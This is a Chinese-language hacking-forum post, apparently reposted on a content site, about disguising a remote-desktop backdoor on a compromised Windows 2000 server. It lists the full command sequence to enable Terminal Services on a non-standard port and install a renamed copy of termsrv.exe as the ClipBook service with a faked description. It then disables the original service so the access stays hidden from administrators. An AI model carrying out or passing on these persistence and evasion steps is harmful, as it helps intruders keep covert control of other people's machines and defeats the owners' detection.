作者:dkollf 来自:http://bbs.pysky.net
不知道大家装自己的后门的时候是怎么修改服务的,我记得曾经有人说过,起服务名是一件需要艺术+技术的事,一个很垃圾的后门会因为你起的服务名而长久存活,而一个很好的后门会因为你的垃圾服务名而立马挂掉,
修改后门经验谈
。废话不说了,就以我自己安装终端服务为例来讲讲改服务的好处吧。
这里我们要用到几个工具,先介绍一下:
3389.exe 这个不说了吧,地球人都知道
tport.exe 这个也应该知道,但是说一下,这个是改3389端口的
serv.exe 服务管理程序,可以安装、删除、修改服务
dtreg.exe CMD下的一个注册表工具,和regedit差不多。
开始,假设我们已经控制了机器,是2kserver的,终端服务还没开,让我们来开吧
3389.exe 1 #安装终端,不重起
tport.exe 9918 #修改端口
net stop ClipSrv #-----------------|删除次要服务
serv.exe remove ClipSrv /y #-----------|为修改服务做准备
copy termsrv.exe clipsvr.exe #将终端的文件拷贝成和要取代的服务比较接近的名字
serv.exe install ClipSrv /b:"%windir%\system32\clipsvr.exe" /n:"ClipBook" /i:yes /u:LocalSystem /s:auto #安装成刚才删除的服务
dtreg.exe -Quiet -Set REG_SZ \HKLM\SYSTEM\CurrentControlSet\Services\ClipBook\Description=支持"剪贴簿查看器",以便可以从远程剪贴簿查阅剪贴页面,
电脑资料
《修改后门经验谈》(https://www.unjs.com)。#修改注册表serv modify termservice /s:disabled #修改原先终端服务的状态
现在重起一次,你会发现终端服务已经开启,端口为9918,打开服务管理器你会发现终端服务已经禁用了,进程里也没有termsrv.exe这个进程,相对来说这个已经很安全了,我一直也是用这中方式开终端,不知道其他人是不是这样干的,大家可以交流一下,呵呵.